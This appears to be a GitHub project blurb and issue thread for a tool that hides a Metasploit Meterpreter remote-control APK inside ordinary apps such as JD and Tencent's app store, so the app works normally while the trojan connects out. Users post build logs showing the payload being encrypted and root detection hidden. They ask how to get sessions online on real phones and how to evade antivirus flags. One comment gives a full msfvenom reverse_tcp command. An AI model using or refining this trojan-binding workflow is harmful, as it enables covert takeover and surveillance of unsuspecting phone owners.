将安卓远控Apk附加进普通的App中,运行新生成的App时,普通App正常运行,远控正常上线。Attach the Android remote control APK to a regular app. When the newly generated app is launched, the regular app operates as normal while the remote control goes online seamlessly.
License: Apache License 2.0
使用安卓模拟器时(雷电模拟器,安卓9),可以正常安装注入的Apk,也可以实现远控。但是在物理机上安装的时候,被检测出风险。
物理机(Redmi 3,Android 5.1.1),注入的应用为天气预报+msf.apk。
无视风险,继续安装,开启App时,远控程序也不会上线(物理机与Kali在同一局域网下,家庭Wifi)
大佬您好,请问怎么在生成木马时自动添加sessioncommunicationtimeout=0和sessionexpirationtimeout=0这两项参数啊?看了您的源码,还是不太明白从哪里入手修改
D doAttachBaseContext 初始化成功!
2023-08-30 17:34:50.341 29504-29504 520ApkBox ...pplication pid-29504 D 获取到dex 中的Application Class
2023-08-30 17:34:50.342 29504-29504 520ApkBox ...pplication pid-29504 D 加载Dex失败: java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
2023-08-30 17:34:50.342 29504-29504 System.err pid-29504 W at com.jingdong.app.mall.a520apkbox.MainApplication.bindRealApplication(MainApplication.java:229)
2023-08-30 17:34:50.342 29504-29504 System.err pid-29504 W at com.jingdong.app.mall.a520apkbox.MainApplication.onCreate(MainApplication.java:188)
2023-08-30 17:34:50.343 29504-29504 System.err pid-29504 W Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.MainActivity" on path: DexPathList[[zip file "/data/app/com.jingdong.app.mall.a520apkbox-1/base.apk"],nativeLibraryDirectories=[/data/app/com.jingdong.app.mall.a520apkbox-1/lib/arm, /data/app/com.jingdong.app.mall.a520apkbox-1/base.apk!/lib/armeabi-v7a, /system/lib, /vendor/lib]]
对多个APK进行注入分别测试后,发现所有的app能够正常安装进入启动页面,后续就会造成空指针闪退
使用机型:小米9
系统版本:MIUI 12.5.6
JDK版本:ARM64 openjdk version "11.0.16" 2022-07-19 OpenJDK 64-Bit
Python3版本:Python 3.10.5
腾讯系列app无法找到App默认启动组件.method public onCreate()V,统一输入组件地址为WorkDir/dexfile/app/classes/com/tencent/tinker/loader/app/TinkerApplication.smali
网易系列闪退暂未解决
按照上面这个路径输入,提示文件不存在
这个软件是需要什么依赖吗
java版本
openjdk 17.0.10 2024-01-16
OpenJDK Runtime Environment (build 17.0.10+7-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.10+7-Debian-1, mixed mode, sharing)
报错
02/08 11:20:05.046 I/HackApk: 已将被注入Apk复制到模板App的assets目录中.
02/08 11:20:05.049 I/HackApk: 已清空模板App中的 mipmap-xxxhdpi 文件夹.
02/08 11:20:05.065 I/HackApk: 重新向模板App中的 mipmap-xxxhdpi 文件夹复制图标文件.
02/08 11:20:05.067 I/HackApk: 所有资源文件已复制完成.
02/08 11:20:05.067 I/HackApk: 正在进行重新编译模板App.
I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 132): [/tmp/brut_util_Jar_129685134684315121427687715297487982335.tmp, p, --forced-package-id, 127, --min-sdk-version, 24, --target-sdk-version, 25, --version-code, 807, --version-name, 4.4.0, --no-version-vectors, -F, /tmp/APKTOOL15424374816079338117.tmp, -e, /tmp/APKTOOL18144024524575765135.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/123456/workDir/apkBoxDecodeDir/res, -M, /root/123456/workDir/apkBoxDecodeDir/AndroidManifest.xml]
root@localhost:~/123456#
怎么解决?
你好 帮我看下这个问题怎么解决,谢谢
W: C:\Users\xxx\Downloads\workDir\apkBoxDecodeDir\res\values\strings.xml:21: error: Error parsing XML: not well-formed (invalid token)
W:
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\xxx\AppData\Local\Temp\brut_util_Jar_9531012300126581481943319605938899655.tmp, p, --forced-package-id, 127, --min-sdk-version, 23, --target-sdk-version, 28, --version-code, 39, --version-name, 1.0.0, --no-version-vectors, -F, C:\Users\xxx\AppData\Local\Temp\APKTOOL13546282770571653699.tmp, -e, C:\Users\xxx\AppData\Local\Temp\APKTOOL2333949434430769853.tmp, -0, arsc, -I, C:\Users\xxx\AppData\Local\apktool\framework\1.apk, -S, C:\Users\xxx\Downloads\workDir\apkBoxDecodeDir\res, -M, C:\Users\xxx\Downloads\workDir\apkBoxDecodeDir\AndroidManifest.xml]
确认该apk没加固,点击安装,显示安装中,然后立即就在模拟器消失了
只有部分命令有效,像geolocate 、send_sms、webcam等都不行,就看看sysinfo这些,是哪里出什么问题了呢,Android 9,msf6.1.5
感谢上个问题的回复,发现了新的问题。
我的被附加的APK的资源文件strings.xml中有下边节点。然后合并APK后,这两个节点没有在合成后的APK中出现
https://127.0.0.1
1101
使用JAVA什么版本可以?
java version 1.8.0_202编译失败
想问下华为手机报毒该怎么解决,我只能确定到是其中的Module引起的
``--------- beginning of crash
--------- beginning of main
07-17 19:42:34.178 W/System.err( 8289): java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
07-17 19:42:34.178 W/System.err( 8289): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.Class.forName(Class.java:324)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.Class.forName(Class.java:285)
07-17 19:42:34.178 W/System.err( 8289): at com.v2ray.ang.a520apkbox.MainApplication.bindRealApplication(MainApplication.java:229)
07-17 19:42:34.178 W/System.err( 8289): at com.v2ray.ang.a520apkbox.MainApplication.onCreate(MainApplication.java:188)
07-17 19:42:34.178 W/System.err( 8289): at android.app.Instrumentation.callApplicationOnCreate(Instrumentation.java:1017)
07-17 19:42:34.178 W/System.err( 8289): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4894)
07-17 19:42:34.178 W/System.err( 8289): at android.app.ActivityThread.-wrap1(ActivityThread.java)
07-17 19:42:34.178 W/System.err( 8289): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1508)
07-17 19:42:34.178 W/System.err( 8289): at android.os.Handler.dispatchMessage(Handler.java:102)
07-17 19:42:34.178 W/System.err( 8289): at android.os.Looper.loop(Looper.java:148)
07-17 19:42:34.178 W/System.err( 8289): at android.app.ActivityThread.main(ActivityThread.java:5654)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.reflect.Method.invoke(Native Method)
07-17 19:42:34.178 W/System.err( 8289): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:782)
07-17 19:42:34.178 W/System.err( 8289): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:672)
07-17 19:42:34.178 W/System.err( 8289): Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.MainActivity" on path: DexPathList[[zip file "/data/app/com.v2ray.ang.a520apkbox-1/base.apk"],nativeLibraryDirectories=[/data/app/com.v2ray.ang.a520apkbox-1/lib/arm64, /data/app/com.v2ray.ang.a520apkbox-1/base.apk!/lib/arm64-v8a, /vendor/lib64, /system/lib64]]
07-17 19:42:34.178 W/System.err( 8289): at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
07-17 19:42:34.178 W/System.err( 8289): ... 15 more
07-17 19:42:34.178 W/System.err( 8289): Suppressed: java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
07-17 19:42:34.179 W/System.err( 8289): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.179 W/System.err( 8289): at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
07-17 19:42:34.179 W/System.err( 8289): at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
07-17 19:42:34.179 W/System.err( 8289): at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
07-17 19:42:34.179 W/System.err( 8289): ... 16 more
07-17 19:42:34.179 W/System.err( 8289): Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
07-17 19:42:34.780 W/System.err( 8315): java.lang.ClassNotFoundException: android.hardware.location.IContextHubService$Stub
07-17 19:42:34.780 W/System.err( 8315): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.Class.forName(Class.java:324)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.Class.forName(Class.java:285)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackreflection.BlackReflection.getClassNameByBlackClass(BlackReflection.java:239)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackreflection.BlackReflection.create(BlackReflection.java:55)
07-17 19:42:34.780 W/System.err( 8315): at black.android.hardware.location.BRIContextHubServiceStub.get(BRIContextHubServiceStub.java:13)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.fake.service.IContextHubServiceProxy.getWho(IContextHubServiceProxy.java:25)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.fake.hook.ClassInvocationStub.injectHook(ClassInvocationStub.java:51)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.fake.hook.HookManager.injectAll(HookManager.java:186)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.fake.hook.HookManager.init(HookManager.java:157)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.BlackBoxCore.doAttachBaseContext(BlackBoxCore.java:159)
07-17 19:42:34.780 W/System.err( 8315): at com.v2ray.ang.a520apkbox.MainApplication.attachBaseContext(MainApplication.java:108)
07-17 19:42:34.780 W/System.err( 8315): at android.app.Application.attach(Application.java:257)
07-17 19:42:34.780 W/System.err( 8315): at android.app.Instrumentation.newApplication(Instrumentation.java:997)
07-17 19:42:34.780 W/System.err( 8315): at android.app.Instrumentation.newApplication(Instrumentation.java:981)
07-17 19:42:34.780 W/System.err( 8315): at android.app.LoadedApk.makeApplication(LoadedApk.java:583)
07-17 19:42:34.780 W/System.err( 8315): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4867)
07-17 19:42:34.780 W/System.err( 8315): at android.app.ActivityThread.-wrap1(ActivityThread.java)
07-17 19:42:34.780 W/System.err( 8315): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1508)
07-17 19:42:34.780 W/System.err( 8315): at android.os.Handler.dispatchMessage(Handler.java:102)
07-17 19:42:34.780 W/System.err( 8315): at android.os.Looper.loop(Looper.java:148)
07-17 19:42:34.780 W/System.err( 8315): at android.app.ActivityThread.main(ActivityThread.java:5654)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.reflect.Method.invoke(Native Method)
07-17 19:42:34.780 W/System.err( 8315): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:782)
07-17 19:42:34.780 W/System.err( 8315): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:672)
07-17 19:42:34.780 W/System.err( 8315): Caused by: java.lang.ClassNotFoundException: Didn't find class "android.hardware.location.IContextHubService$Stub" on path: DexPathList[[zip file "/data/app/com.v2ray.ang.a520apkbox-1/base.apk"],nativeLibraryDirectories=[/data/app/com.v2ray.ang.a520apkbox-1/lib/arm64, /data/app/com.v2ray.ang.a520apkbox-1/base.apk!/lib/arm64-v8a, /vendor/lib64, /system/lib64]]
07-17 19:42:34.780 W/System.err( 8315): at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
07-17 19:42:34.780 W/System.err( 8315): ... 25 more
07-17 19:42:34.780 W/System.err( 8315): Suppressed: java.lang.ClassNotFoundException: android.hardware.location.IContextHubService$Stub
07-17 19:42:34.780 W/System.err( 8315): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
07-17 19:42:34.780 W/System.err( 8315): ... 26 more
07-17 19:42:34.780 W/System.err( 8315): Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
07-17 19:42:34.843 W/System.err( 8315): java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
07-17 19:42:34.843 W/System.err( 8315): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.Class.forName(Class.java:324)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.Class.forName(Class.java:285)
07-17 19:42:34.843 W/System.err( 8315): at com.v2ray.ang.a520apkbox.MainApplication.bindRealApplication(MainApplication.java:229)
07-17 19:42:34.843 W/System.err( 8315): at com.v2ray.ang.a520apkbox.MainApplication.onCreate(MainApplication.java:188)
07-17 19:42:34.843 W/System.err( 8315): at android.app.Instrumentation.callApplicationOnCreate(Instrumentation.java:1017)
07-17 19:42:34.843 W/System.err( 8315): at top.niunaijun.blackbox.fake.delegate.BaseInstrumentationDelegate.callApplicationOnCreate(BaseInstrumentationDelegate.java:225)
07-17 19:42:34.843 W/System.err( 8315): at top.niunaijun.blackbox.fake.delegate.AppInstrumentation.callApplicationOnCreate(AppInstrumentation.java:140)
07-17 19:42:34.843 W/System.err( 8315): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4894)
07-17 19:42:34.843 W/System.err( 8315): at android.app.ActivityThread.-wrap1(ActivityThread.java)
07-17 19:42:34.843 W/System.err( 8315): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1508)
07-17 19:42:34.843 W/System.err( 8315): at android.os.Handler.dispatchMessage(Handler.java:102)
07-17 19:42:34.843 W/System.err( 8315): at android.os.Looper.loop(Looper.java:148)
07-17 19:42:34.843 W/System.err( 8315): at android.app.ActivityThread.main(ActivityThread.java:5654)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.reflect.Method.invoke(Native Method)
07-17 19:42:34.843 W/System.err( 8315): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:782)
07-17 19:42:34.843 W/System.err( 8315): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:672)
07-17 19:42:34.843 W/System.err( 8315): Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.MainActivity" on path: DexPathList[[zip file "/data/app/com.v2ray.ang.a520apkbox-1/base.apk"],nativeLibraryDirectories=[/data/app/com.v2ray.ang.a520apkbox-1/lib/arm64, /data/app/com.v2ray.ang.a520apkbox-1/base.apk!/lib/arm64-v8a, /vendor/lib64, /system/lib64]]
07-17 19:42:34.843 W/System.err( 8315): at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
07-17 19:42:34.843 W/System.err( 8315): ... 17 more
07-17 19:42:34.843 W/System.err( 8315): Suppressed: java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
07-17 19:42:34.843 W/System.err( 8315): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
07-17 19:42:34.843 W/System.err( 8315): ... 18 more
07-17 19:42:34.843 W/System.err( 8315): Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
根据提示下载配置,
~/Downloads/京东.apk ~/Downloads/msf.apk 最终生成的520apk
构造后发现在模拟器android 6 7 9 10 11都无法运行,麻烦问下应用啥版本呢?
.method public onCreate()V,统一输入组件地址为WorkDir/dexfile/app/classes/com/tencent/tinker/loader/app/TinkerApplication.smali文件路径错误:确保文件路径是正确的,并且文件确实存在。
文件权限问题:确保当前用户对文件具有足够的读取权限。
文件格式问题:确保文件是有效的 Apk 文件,没有被修改或损坏。
7/24 19:43:33.306 E/Main: 读取被注入Apk文件信息失败, 无法进行下一步, 程序退出! /root/Downloads/京东.apk
java.nio.file.NoSuchFileException: /root/Downloads/京东.apk
免杀后的APK运行无法上线,但是被捆绑APP可以正常运行使用,不知道怎么回事,有大佬遇到过吗?
我使用的是腾讯的软件但是按照您提供的路径找不到/tinker/loader/app/TinkerApplication.smali
你好,目前发现有个问题就是捆绑的正常的APK的名字必须是京东.apk(就是本身APK可以是其他APK,但是名字必须是京东),然后执行那个jar包合并才能正常执行然后生成出来捆绑msf木马的APK,安装到虚拟机中的时候是可以正常安装和上线的,但是在真实手机,安卓13版本以下,安装会显示安装包损坏,请问这一问题您是否有遇到过?
BaoGuo仍给你一个Apk,请安装它!
ava -jar a520ApkHook-1.1-jar-with-dependencies.jar yyb.apk msf.apk
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
06/06 14:39:11.763 I/Config: 创建工作目录, /root/workDir
06/06 14:39:11.772 I/Config: 初始化配置信息完成.
06/06 14:39:11.772 I/Main: 启动程序.
______ ___ ____ ___ __ __ __ __
/ /| \ / __ \ / | ____ / / / / / /____ ____ / /__
/___ \ / // / / // /| | / __ \ / //// // // __ \ / __ \ / //_/
/ / / __// // // ___ | / // // ,< / __ // // // // // ,<
// //_/// ||/ .///||// // _/ _///||
//
06/06 14:39:11.772 I/Main: 初始化工作环境.
06/06 14:39:11.773 I/Config: 从Jar包中释放工具文件.
06/06 14:39:11.887 I/Config: 已释放 apktool.jar .
06/06 14:39:11.894 I/Config: 已释放 apksigner.jar .
06/06 14:39:11.894 I/Config: 已释放 Android.keystore .
06/06 14:39:11.920 I/Config: 已释放 520ApkBox64.apk .
06/06 14:39:11.942 I/Config: 已释放 520ApkBox32.apk .
06/06 14:39:11.942 I/Main: 释放所有脚本成功.
06/06 14:39:11.943 I/Main: 被注入的 Apk 文件为: yyb.apk
06/06 14:39:11.943 I/Main: 进行注入的 Payload Apk 文件为: msf.apk
06/06 14:39:11.943 I/Main: 尝试读取被注入Apk的信息. yyb.apk
06/06 14:39:12.017 I/GetSourceApkInfo: 获取注入 Apk 的MetaDate信息: {AppTargetSdkVersion=26, AppMaxSdkVersion=null, AppVersionCode=8432130, AppVersionName=8.4.3, AppMinSdkVersion=21, AppName=应用宝, AppPackageName=com.tencent.android.qqdownloader}
06/06 14:39:12.018 I/GetSourceApkInfo: 获取注入 Apk 的所有图标信息: [Icon{path='res/b/ic_launcher.png', density=0, size=2071}, Icon{path='res/k/ic_launcher.png', density=320, size=2071}]
06/06 14:39:12.021 I/GetSourceApkInfo: 获取注入 Apk 的最大的图标信息: Icon{path='res/k/ic_launcher.png', density=320, size=2071}
06/06 14:39:12.023 I/GetSourceApkInfo: 读取注入 Apk 最大的图标并保存, 保存位置: /root/workDir/hackApkIcon.png
06/06 14:39:12.144 I/GetSourceApkInfo: 在注入 Apk 中找到文件: lib/arm64-v8a/libBugly_Native.so
06/06 14:39:12.144 I/GetSourceApkInfo: 获取注入 Apk 的Arch信息: arm64-v8a
06/06 14:39:12.144 I/Main: 读取被注入Apk信息已完成.
06/06 14:39:12.145 I/Main: 尝试读取 Payload Apk的信息. msf.apk
06/06 14:39:12.146 I/GetPayloadApkInfo: 使用apktool反编译 Payload Apk, msf.apk
I: Using Apktool 2.7.0 on msf.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values / XMLs...
I: Copying raw classes.dex file...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
06/06 14:39:13.751 I/GetPayloadApkInfo: 解析 Payload Apk 的AndroidManifest.xml文件, 并创建新的 AndroidManifest-New.xml文件.
06/06 14:39:13.765 I/GetPayloadApkInfo: 为目标receiver添加android:exported=true属性.
06/06 14:39:13.781 I/GetPayloadApkInfo: 成功获取到 Payload Apk 的MainActivityName.
06/06 14:39:13.783 I/GetPayloadApkInfo: 获取 payload Apk 文件中的Provider、Receiver、Service、Meta-data、Activity成功.
06/06 14:39:13.783 I/GetPayloadApkInfo: 尝试对 Payload Apk的dex文件进行加密压缩. msf.apk
06/06 14:39:13.783 I/GetPayloadApkInfo: dex文件加密密码为: d8Fx23JB
06/06 14:39:13.793 I/Main: 开始进行对被注入Apk进行包装.
06/06 14:39:13.793 I/HackApk: 目标Apk支持64位, 使用apktool反编译模板Apk, /root/workDir/libs/520ApkBox64.apk
I: Using Apktool 2.7.0 on 520ApkBox64.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values / XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
I: Copying META-INF/services directory
06/06 14:39:17.937 I/Main: 反编译模板Apk成功.
06/06 14:39:17.937 I/HackApk: 解析并修改模板Apk的AndroidManifest.xml文件.
06/06 14:39:17.945 I/HackApk: 设置模板Appassets目录存储的被注入Apk名字. 1ce63c7f-55cb-4931-b8bc-7af39697f918
06/06 14:39:17.945 I/HackApk: 设置包装器的启动包名. com.tencent.android.qqdownloader
06/06 14:39:17.945 I/HackApk: 设置包装器开启守护进程. false
06/06 14:39:17.946 I/HackApk: 设置包装器隐藏Root. true
06/06 14:39:17.946 I/HackApk: 设置包装器隐藏Xposed. true
06/06 14:39:17.946 I/HackApk: 设置压缩后的dex文件名字. b17de3a2-9419-46a6-ae7c-4e98d2ccd2c6
06/06 14:39:17.946 I/HackApk: 设置dex文件的压缩包密码. d8Fx23JB
06/06 14:39:17.946 I/HackApk: 设置 Payload apk 的ApplicationName. android.app.Application
06/06 14:39:17.946 I/HackApk: 设置 Payload apk 的MainActivityName. com.metasploit.stage.MainActivity
06/06 14:39:17.946 I/HackApk: 将payload apk中的AndroidManifest-new.xml追加到apkbox的AndroidManifest.xml中.
06/06 14:39:17.950 I/HackApk: 写入模板App的AndroidManifest.xml文件成功.
06/06 14:39:17.951 I/HackApk: 解析并修改模板App的string.xml文件.
06/06 14:39:17.954 I/HackApk: 设置模板App显示的名字. 应用宝
06/06 14:39:17.955 I/HackApk: 写入模板App的string.xml文件成功.
06/06 14:39:17.956 I/HackApk: 修复模板App的values-v31/colors.xml文件.
06/06 14:39:17.957 I/HackApk: 修复模板App的values-v31/colors.xml文件成功.
06/06 14:39:17.957 I/HackApk: 解析并修改模板App的apktool.yml文件.
06/06 14:39:17.958 I/HackApk: 修改模板App的minSdkVersion、targetSdkVersion、versionName、versionCode信息.
06/06 14:39:17.958 I/HackApk: 修改模板App的apktool.yml文件成功.
06/06 14:39:17.958 I/HackApk: 原始smali文件路径: /root/workDir/apkBoxDecodeDir/smali/com/android/a520apkbox
06/06 14:39:17.958 I/HackApk: 修改后smali文件路径: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox
06/06 14:39:17.959 I/HackApk: 创建新的smali目录: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox
06/06 14:39:17.968 I/HackApk: 复制原始smali文件到新的smali目录中.
06/06 14:39:17.972 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$style.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.972 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication$1.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.973 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$mipmap.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.974 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.975 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/ProxyUtils.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.975 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication$2.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.976 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$layout.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.976 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$color.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.977 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$xml.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.977 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/ClassLoaderUtils.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.978 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$string.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.979 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/BuildConfig.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.979 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainActivity.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.992 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.995 I/HackApk: 已修改AndroidManifest.xml文件. 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox
06/06 14:39:17.999 I/HackApk: 开始复制资源文件到模板App中.
06/06 14:39:17.999 I/HackApk: 已将Payload Apk 的Dex压缩包复制到模板App的assets目录中.
06/06 14:39:18.048 I/HackApk: 已将被注入Apk复制到模板App的assets目录中.
06/06 14:39:18.048 I/HackApk: 已清空模板App中的 mipmap-xxxhdpi 文件夹.
java.lang.NullPointerException
at java.base/java.io.File.(File.java:278)
at org.a520apkhook.HackApk.copyAssesResFile(HackApk.java:248)
at org.a520apkhook.App.startHackApk(App.java:125)
at org.a520apkhook.App.run(App.java:76)
at picocli.CommandLine.executeUserObject(CommandLine.java:2026)
at picocli.CommandLine.access$1500(CommandLine.java:148)
at picocli.CommandLine$RunLast.executeUserObjectOfLastSubcommandWithSameParent(CommandLine.java:2461)
at picocli.CommandLine$RunLast.handle(CommandLine.java:2453)
at picocli.CommandLine$RunLast.handle(CommandLine.java:2415)
at picocli.CommandLine$AbstractParseResultHandler.execute(CommandLine.java:2273)
at picocli.CommandLine$RunLast.execute(CommandLine.java:2417)
at picocli.CommandLine.execute(CommandLine.java:2170)
at org.a520apkhook.App.main(App.java:44)
使用:msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk生成一个APK,我想知道有没有这个APK对应的源码,我想尝试在这个源码上做一些修改
这是为什么
大佬,这个要怎么ji解决
